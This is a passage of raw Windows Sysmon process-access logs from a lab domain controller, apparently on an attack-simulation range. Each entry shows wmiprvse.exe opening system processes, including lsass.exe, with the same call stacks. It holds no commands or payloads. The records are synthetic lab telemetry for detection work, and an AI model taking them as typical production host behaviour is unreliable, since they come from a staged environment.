Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.073{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.072{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.072{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.071{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.070{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.069{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.069{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 